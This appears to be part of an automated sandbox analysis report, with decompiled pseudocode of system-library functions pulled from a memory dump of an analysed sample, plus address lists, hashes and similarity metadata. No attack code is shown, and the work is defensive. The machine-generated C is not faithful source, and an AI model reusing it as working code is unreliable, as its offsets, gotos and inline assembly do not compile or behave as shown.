                                                                                                            0x0112e596
                                                                                                            0x0112e59e
                                                                                                            0x0112e5a0
                                                                                                            0x0112e5a6
                                                                                                            0x0112e61d
                                                                                                            0x0112e61d
                                                                                                            0x0112e621
                                                                                                            0x0112e623
                                                                                                            0x0112e630
                                                                                                            0x0112e630
                                                                                                            0x0112e7e6
                                                                                                            0x0112e7eb
                                                                                                            0x0112e7ed
                                                                                                            0x0112e7f4
                                                                                                            0x0112e7fa
                                                                                                            0x0112e7ff
                                                                                                            0x0112e7ff
                                                                                                            0x0112e80a
                                                                                                            0x0112e812
                                                                                                            0x0112e812
                                                                                                            0x0112e5ab
                                                                                                            0x0112e5b4
                                                                                                            0x0112e5b9
                                                                                                            0x0112e5be
                                                                                                            0x0112e5c0
                                                                                                            0x0112e5c2
                                                                                                            0x0112e5c8
                                                                                                            0x0112e5c9
                                                                                                            0x0112e5cb
                                                                                                            0x0112e5cc
                                                                                                            0x0112e5d5
                                                                                                            0x0112e5e4
                                                                                                            0x0112e5f1
                                                                                                            0x0112e5f8
                                                                                                            0x0112e5f8
                                                                                                            0x0112e5d5
                                                                                                            0x0112e602
                                                                                                            0x0112e616
                                                                                                            0x0112e63d
                                                                                                            0x0112e644
                                                                                                            0x0112e64d
                                                                                                            0x0112e652
                                                                                                            0x0112e657
                                                                                                            0x0112e659
                                                                                                            0x0112e65b
                                                                                                            0x0112e661
                                                                                                            0x0112e662
                                                                                                            0x0112e664
                                                                                                            0x0112e665
                                                                                                            0x0112e66e
                                                                                                            0x0112e67d
                                                                                                            0x0112e68a
                                                                                                            0x0112e691
                                                                                                            0x0112e691
                                                                                                            0x0112e66e
                                                                                                            0x0112e6b0
                                                                                                            0x00000000
                                                                                                            0x0112e6b6
                                                                                                            0x0112e6bd
                                                                                                            0x0112e6c7
                                                                                                            0x0112e6d7
                                                                                                            0x0112e6d9
                                                                                                            0x0112e6db
                                                                                                            0x0112e6de
                                                                                                            0x0112e6e3
                                                                                                            0x0112e6f3
                                                                                                            0x0112e6fc
                                                                                                            0x0112e700
                                                                                                            0x0112e700
                                                                                                            0x0112e704
                                                                                                            0x0112e70a
                                                                                                            0x0112e70a
                                                                                                            0x0112e713
                                                                                                            0x0112e716
                                                                                                            0x0112e719
                                                                                                            0x0112e720
                                                                                                            0x0112e761
                                                                                                            0x0112e76b
                                                                                                            0x0112e774
                                                                                                            0x0112e77a
                                                                                                            0x0112e77a
                                                                                                            0x0112e78a
                                                                                                            0x0112e791
                                                                                                            0x0112e799
                                                                                                            0x0112e79b
                                                                                                            0x0112e79f
                                                                                                            0x0112e7aa
                                                                                                            0x0112e7c0
                                                                                                            0x0112e7ac
                                                                                                            0x0112e7b2
                                                                                                            0x0112e7b9
                                                                                                            0x0112e7b9
                                                                                                            0x0112e7c7
                                                                                                            0x0112e806
                                                                                                            0x00000000
                                                                                                            0x0112e7c9
                                                                                                            0x0112e7d1
                                                                                                            0x0112e7d8
                                                                                                            0x00000000
                                                                                                            0x0112e7d8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0112e722
                                                                                                            0x0112e72e
                                                                                                            0x0112e748
                                                                                                            0x0112e74c
                                                                                                            0x0112e754
                                                                                                            0x0112e756
                                                                                                            0x0112e75c
                                                                                                            0x0112e75c
                                                                                                            0x00000000
                                                                                                            0x0112e75c
                                                                                                            0x0112e758
                                                                                                            0x0112e758
                                                                                                            0x00000000
                                                                                                            0x0112e758
                                                                                                            0x0112e750
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0112e752
                                                                                                            0x00000000
                                                                                                            0x0112e752
                                                                                                            0x0112e730
                                                                                                            0x0112e735
                                                                                                            0x0112e73d
                                                                                                            0x0112e73f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0112e741
                                                                                                            0x0112e741
                                                                                                            0x00000000
                                                                                                            0x0112e741
                                                                                                            0x0112e739
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0112e73b
                                                                                                            0x00000000
                                                                                                            0x0112e73b
                                                                                                            0x0112e722
                                                                                                            0x0112e720
                                                                                                            0x0112e6b0
                                                                                                            0x0112e618
                                                                                                            0x00000000
                                                                                                            0x0112e618

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: `$`
                                                                                                            • API String ID: 0-197956300
                                                                                                            • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                            • Instruction ID: e29ff20ff6cab1bbaf24652eab5e03b0e686c83b3a57b285e9171e9691042d0d
                                                                                                            • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                            • Instruction Fuzzy Hash: 6891A3312057529FE728CF29C841B5BBBE5BF84714F14892DFA95CB280E774E814CB92
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010E51BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 77%
                                                                                                            			E010E51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x11405f0);
				E010BD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0107EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E010E53CA(0);
						return E010BD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E010AF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01083690(1, _t117, 0x1041810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E010AAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01084620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E010AAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E010E500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E010A9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                                            0x010e51be
                                                                                                            0x010e51c3
                                                                                                            0x010e51c8
                                                                                                            0x010e51cd
                                                                                                            0x010e51d0
                                                                                                            0x010e51d3
                                                                                                            0x010e51d8
                                                                                                            0x010e51db
                                                                                                            0x010e51de
                                                                                                            0x010e51e0
                                                                                                            0x010e51e3
                                                                                                            0x010e51e6
                                                                                                            0x010e51e8
                                                                                                            0x010e5342
                                                                                                            0x010e5351
                                                                                                            0x010e5356
                                                                                                            0x010e535a
                                                                                                            0x010e5360
                                                                                                            0x010e5363
                                                                                                            0x010e5366
                                                                                                            0x010e5369
                                                                                                            0x010e5369
                                                                                                            0x010e536b
                                                                                                            0x010e536b
                                                                                                            0x010e5370
                                                                                                            0x010e53a3
                                                                                                            0x010e53a4
                                                                                                            0x010e53a6
                                                                                                            0x010e53ab
                                                                                                            0x010e53ab
                                                                                                            0x010e53ae
                                                                                                            0x010e53ae
                                                                                                            0x010e53b5
                                                                                                            0x010e53bf
                                                                                                            0x010e53bf
                                                                                                            0x010e5375
                                                                                                            0x010e5396
                                                                                                            0x010e53a0
                                                                                                            0x010e53a0
                                                                                                            0x00000000
                                                                                                            0x010e5396
                                                                                                            0x010e5377
                                                                                                            0x010e5379
                                                                                                            0x010e537f
                                                                                                            0x010e538c
                                                                                                            0x010e5390
                                                                                                            0x00000000
                                                                                                            0x010e5390
                                                                                                            0x010e51ee
                                                                                                            0x010e51f1
                                                                                                            0x010e5301
                                                                                                            0x010e5310
                                                                                                            0x010e5315
                                                                                                            0x010e5318
                                                                                                            0x010e531b
                                                                                                            0x010e5320
                                                                                                            0x010e532e
                                                                                                            0x010e5331
                                                                                                            0x00000000
                                                                                                            0x010e5331
                                                                                                            0x010e5328
                                                                                                            0x010e5329
                                                                                                            0x00000000
                                                                                                            0x010e5329
                                                                                                            0x010e51fa
                                                                                                            0x010e5235
                                                                                                            0x010e5236
                                                                                                            0x010e5239
                                                                                                            0x010e523f
                                                                                                            0x010e5240
                                                                                                            0x010e5241
                                                                                                            0x010e5242
                                                                                                            0x010e5246
                                                                                                            0x010e5247
                                                                                                            0x010e524e
                                                                                                            0x010e5251
                                                                                                            0x010e5267
                                                                                                            0x010e5269
                                                                                                            0x010e526e
                                                                                                            0x010e527d
                                                                                                            0x010e527e
                                                                                                            0x010e5281
                                                                                                            0x010e5282
                                                                                                            0x010e5287
                                                                                                            0x010e5288
                                                                                                            0x010e528a
                                                                                                            0x010e528f
                                                                                                            0x010e5294
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010e529a
                                                                                                            0x010e529c
                                                                                                            0x010e529e
                                                                                                            0x010e529e
                                                                                                            0x010e52a4
                                                                                                            0x010e52b0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010e52ba
                                                                                                            0x010e52bc
                                                                                                            0x010e52bc
                                                                                                            0x010e52d4
                                                                                                            0x010e52d9
                                                                                                            0x010e52dc
                                                                                                            0x010e52e1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010e52e7
                                                                                                            0x010e52f4
                                                                                                            0x00000000
                                                                                                            0x010e52f4
                                                                                                            0x010e5270
                                                                                                            0x00000000
                                                                                                            0x010e5270
                                                                                                            0x010e51fc
                                                                                                            0x010e51fd
                                                                                                            0x010e5202
                                                                                                            0x010e5203
                                                                                                            0x010e5205
                                                                                                            0x010e520a
                                                                                                            0x010e520f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010e521b
                                                                                                            0x010e5226
                                                                                                            0x010e522b
                                                                                                            0x010e521d
                                                                                                            0x010e521d
                                                                                                            0x010e5222
                                                                                                            0x010e5222
                                                                                                            0x010e522d
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID: Legacy$UEFI
                                                                                                            • API String ID: 2994545307-634100481
                                                                                                            • Opcode ID: a865e97f09caea41f5d287a2997c7b48274db0ab4aced92aebba0e41efc6031b
                                                                                                            • Instruction ID: 3046290993e13b5a68788241343348a76c409297d936ac099a3f089dd9fed263
                                                                                                            • Opcode Fuzzy Hash: a865e97f09caea41f5d287a2997c7b48274db0ab4aced92aebba0e41efc6031b
                                                                                                            • Instruction Fuzzy Hash: 2A517DB5A006099FDB24DFA9CD84BADBBF8FB48704F14886DE689EB251D7719900CB10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0108B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 76%
                                                                                                            			E0108B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x115d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01087D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01138CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E010A9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E010AB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E010ACE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01087D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01138F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E010AAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1158628; // 0x0
								_v68 = _t77;
								_t78 =  *0x115862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1158628; // 0x0
							_t116 =  *0x115862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                                            0x0108b94c
                                                                                                            0x0108b956
                                                                                                            0x0108b95c
                                                                                                            0x0108b95e
                                                                                                            0x0108b964
                                                                                                            0x0108b969
                                                                                                            0x0108b96d
                                                                                                            0x0108b96d
                                                                                                            0x0108b970
                                                                                                            0x0108b974
                                                                                                            0x0108b97a
                                                                                                            0x0108badf
                                                                                                            0x0108badf
                                                                                                            0x0108bae2
                                                                                                            0x0108bae4
                                                                                                            0x0108bae6
                                                                                                            0x0108baf0
                                                                                                            0x010d2cb8
                                                                                                            0x0108baf6
                                                                                                            0x0108baf6
                                                                                                            0x0108baf6
                                                                                                            0x0108bafd
                                                                                                            0x0108bb1f
                                                                                                            0x0108bb1f
                                                                                                            0x0108baff
                                                                                                            0x0108bb00
                                                                                                            0x0108bb00
                                                                                                            0x0108bb03
                                                                                                            0x0108bb03
                                                                                                            0x0108bacb
                                                                                                            0x0108bacf
                                                                                                            0x0108bad0
                                                                                                            0x0108bad1
                                                                                                            0x0108badc
                                                                                                            0x0108badc
                                                                                                            0x0108b980
                                                                                                            0x0108b980
                                                                                                            0x0108b988
                                                                                                            0x0108b98b
                                                                                                            0x0108b98d
                                                                                                            0x0108b990
                                                                                                            0x0108b993
                                                                                                            0x0108b999
                                                                                                            0x0108b99b
                                                                                                            0x0108b9a1
                                                                                                            0x0108b9a5
                                                                                                            0x0108b9aa
                                                                                                            0x0108b9b0
                                                                                                            0x0108b9bb
                                                                                                            0x0108b9c0
                                                                                                            0x0108b9c3
                                                                                                            0x0108b9ca
                                                                                                            0x0108b9cc
                                                                                                            0x0108b9cf
                                                                                                            0x0108b9d3
                                                                                                            0x0108b9d7
                                                                                                            0x0108ba94
                                                                                                            0x0108ba94
                                                                                                            0x0108ba98
                                                                                                            0x0108baa3
                                                                                                            0x010d2ccb
                                                                                                            0x0108baa9
                                                                                                            0x0108baa9
                                                                                                            0x0108baa9
                                                                                                            0x0108bab1
                                                                                                            0x010d2cd5
                                                                                                            0x010d2cdd
                                                                                                            0x010d2cdd
                                                                                                            0x0108babb
                                                                                                            0x0108babc
                                                                                                            0x0108bac2
                                                                                                            0x0108bac3
                                                                                                            0x0108bac3
                                                                                                            0x0108bac6
                                                                                                            0x00000000
                                                                                                            0x0108b9dd
                                                                                                            0x0108b9dd
                                                                                                            0x0108b9e7
                                                                                                            0x0108b9e7
                                                                                                            0x0108b9ec
                                                                                                            0x0108b9ec
                                                                                                            0x0108b9f1
                                                                                                            0x0108b9f5
                                                                                                            0x0108b9fa
                                                                                                            0x0108ba00
                                                                                                            0x0108ba0c
                                                                                                            0x0108ba10
                                                                                                            0x0108ba10
                                                                                                            0x0108ba12
                                                                                                            0x0108ba18
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0108bb26
                                                                                                            0x0108bb26
                                                                                                            0x0108ba1e
                                                                                                            0x0108ba1e
                                                                                                            0x0108ba23
                                                                                                            0x0108ba25
                                                                                                            0x0108ba2c
                                                                                                            0x0108ba30
                                                                                                            0x0108ba35
                                                                                                            0x0108ba35
                                                                                                            0x0108ba41
                                                                                                            0x0108ba46
                                                                                                            0x0108ba4c
                                                                                                            0x0108ba50
                                                                                                            0x0108ba54
                                                                                                            0x0108ba6a
                                                                                                            0x0108ba6e
                                                                                                            0x0108ba70
                                                                                                            0x0108ba74
                                                                                                            0x0108ba78
                                                                                                            0x0108ba7a
                                                                                                            0x0108ba7c
                                                                                                            0x0108ba8e
                                                                                                            0x0108ba90
                                                                                                            0x0108ba92
                                                                                                            0x0108bb14
                                                                                                            0x0108bb14
                                                                                                            0x0108bb16
                                                                                                            0x0108bb16
                                                                                                            0x00000000
                                                                                                            0x0108ba7c
                                                                                                            0x0108bb0a
                                                                                                            0x0108bb0d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0108bb0f

                                                                                                            APIs
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0108B9A5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                            • String ID:
                                                                                                            • API String ID: 885266447-0
                                                                                                            • Opcode ID: edc5a41f91437cd272a2367013261f744730661ef634405e6c5b01bb6c913a45
                                                                                                            • Instruction ID: 5238df192b994e25c27ba2b4a97047d22a24986f7db6b0d38c74d7e68cf311dd
                                                                                                            • Opcode Fuzzy Hash: edc5a41f91437cd272a2367013261f744730661ef634405e6c5b01bb6c913a45
                                                                                                            • Instruction Fuzzy Hash: 34515771A08741CFC764EF6DC09092AFBE5FB88610F1489AEE6D687355D770E844CB92
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0106B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E0106B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x113f7a8);
				E010BD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E010BD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E010AD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E010AF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L010BDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E010AB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
